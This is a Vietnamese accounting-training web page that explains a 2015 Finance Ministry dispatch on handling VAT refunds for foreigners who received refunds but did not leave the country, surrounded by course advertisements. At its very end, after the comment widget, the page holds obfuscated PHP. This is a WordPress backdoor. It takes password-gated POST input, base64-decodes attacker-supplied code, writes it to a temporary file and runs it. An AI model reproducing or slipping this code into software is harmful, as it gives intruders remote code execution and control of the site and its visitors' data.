1

Hướng dẫn cách xử lý vướng mắc hoàn thuế GTGT cho người nước ngoài không xuất cảnh 2015

HỌC KÈM RIÊNG KẾ TOÁN 1-1 xem ngay

LỚP HỌC KẾ TOÁN NỘI BỘ CẤP TỐC xem ngay

LỚP KẾ TOÁN CHO NGƯỜI MỚI BẮT ĐẦU xem ngay

Trung tâm kế toán tại tphcm tham khảo và chia sẻ cho các bạn kế toán về “cách xử lý hoàn thuế GTGT cho người nước ngoài không xuất cảnh năm 2015 mới nhất

xu ly hoan thue gtgt cho nguoi nguoc ngoai

Ngày 29/6/2015, Bộ Tài chính ban hành Công văn 8724/BTC-TCHQ hướng dẫn xử lý trường hợp người nước ngoài đã được hoàn thuế giá trị gia tăng nhưng không xuất cảnh trở lại nội địa như sau:

Cơ quan Hải quan hướng dẫn người nước ngoài xuất trình hàng hóa, chứng từ chi tiền hoàn thuế GTGT do ngân hàng phát hành (nếu có).

1.Trường hợp người nước ngoài có mang theo hàng hóa đã được ngân hàng thương mại hoàn thuế GTGT, cơ quan hải quan hướng dẫn người nước ngoài có thể lựa chọn một trong hai cách xử lý sau:

– Người nước ngoài gửi lại hàng hóa cho cơ quan hải quan: Cơ quan hải quan lập biên bản chứng nhận (2 bản), giao cho người nước ngoài 01 bản và tạm giữ hàng hóa đã được ngân hàng thương mại hoàn trả tiền thuế GTGT; Hướng dẫn, giải thích cho người nước ngoài biết khi người nước ngoài tiếp tục xuất cảnh thì thông báo trước cho cơ quan hải quan trước 24 giờ trước khi xuất cảnh; Khi xuất cảnh thì xuất trình cho cơ quan hải quan biên bản chứng nhận do cơ quan hải quan lập để nhận lại hàng hóa đang được cơ quan hải quan tạm giữ. Sau khi người nước ngoài nhận lại hàng hóa do cơ quan hải quan tạm giữ, cơ quan hải quan hướng dẫn, giám sát người nước ngoài vào khu vực cách ly.

– Người nước ngoài mang hàng hóa đã được hoàn thuế GTGT theo người: Cơ quan Hải quan hướng dẫn người nước ngoài cùng đến quầy của ngân hàng thương mại là đại lý hoàn thuế GTGT đã thực hiện hoàn thuế GTGT cho người nước ngoài để phối hợp xử lý.

+ Cơ quan hải quan gạch bỏ dấu “Đồng ý hoàn thuế” trên hóa đơn kiêm tờ khai hoàn thuế GTGT, ghi rõ lý do và đóng dấu công chức hải quan sau khi người nước ngoài đã nộp lại tiền hoàn thuế cho Ngân hàng thương mại.

+ Ngân hàng thương mại thực hiện: Thu lại tiền đã hoàn cho người nước ngoài; Thu lại chứng từ chi tiền hoàn thuế (nếu có); Gạch bỏ chữ ký, dấu xác nhận đã thanh toán tiền hoàn thuế GTGT cho người nước ngoài của ngân hàng thương mại trên hóa đơn kiêm tờ khai hoàn thuế và trả lại toàn bộ hóa đơn kiêm tờ khai hoàn thuế GTGT cho người nước ngoài; Không thực hiện trích tiền phí hoàn thuế 15% trên tổng số hàng hóa đủ điều kiện hoàn thuế của khách nước ngoài vừa thu lại tiền hoàn thuế.

+ Trường hợp người nước ngoài sau đó xuất cảnh, tiếp tục sử dụng hóa đơn kiêm tờ khai hoàn thuế GTGT mà cơ quan hải quan đã gạch bỏ dấu “ Đồng ý hoàn thuế”, ngân hàng thương mại gạch bỏ chữ ký, dấu xác nhận đã thanh toán tiền hoàn thuế GTGT cho người nước ngoài đủ vẫn được hoàn thuế GTGT trong trường hợp hóa đơn kiêm tờ khai hoàn thuế được lập trong thời gian 60 (sáu mươi) ngày tính đến ngày người nước ngoài thực xuất cảnh. Thủ tục hoàn thuế quy định tại Điều 19, Điều 20 Thông tư số 72/2014/TT-BTC ngày 30/5/2014 của Bộ Tài chính.

2.Trường hợp người nước ngoài không mang hàng hóa theo người (hàng hóa có thể ký gửi theo chuyến bay, gửi người thân, bạn bè…trên cùng chuyến bay) – hàng hóa đã xuất khẩu:

– Người nước ngoài có trách nhiệm liên hệ với cơ quan hải quan cửa khẩu nơi làm thủ tục hoàn thuế GTGT để khai báo việc không thực hiện xuất cảnh.

– Cơ quan hải quan cửa khẩu nơi làm thủ tục hoàn thuế GTGT cho người nước ngoài thực hiện kiểm tra hàng hóa người nước ngoài đã được hoàn thuế không mang trở lại nội địa.

– Không thu lại tiền đã hoàn thuế của người nước ngoài khi hàng hóa thực xuất khẩu.

LỚP KẾ TOÁN NỘI BỘ ONLINE xem ngay

LỚP TIN HỌC VĂN PHÒNG CẤP TỐC xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

LỚP KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆP xem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Subscribe
  Notify of
  guest

  0 Comments
  Inline Feedbacks
  View all comments
  0
  Would love your thoughts, please comment.x
  ()
  x
  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}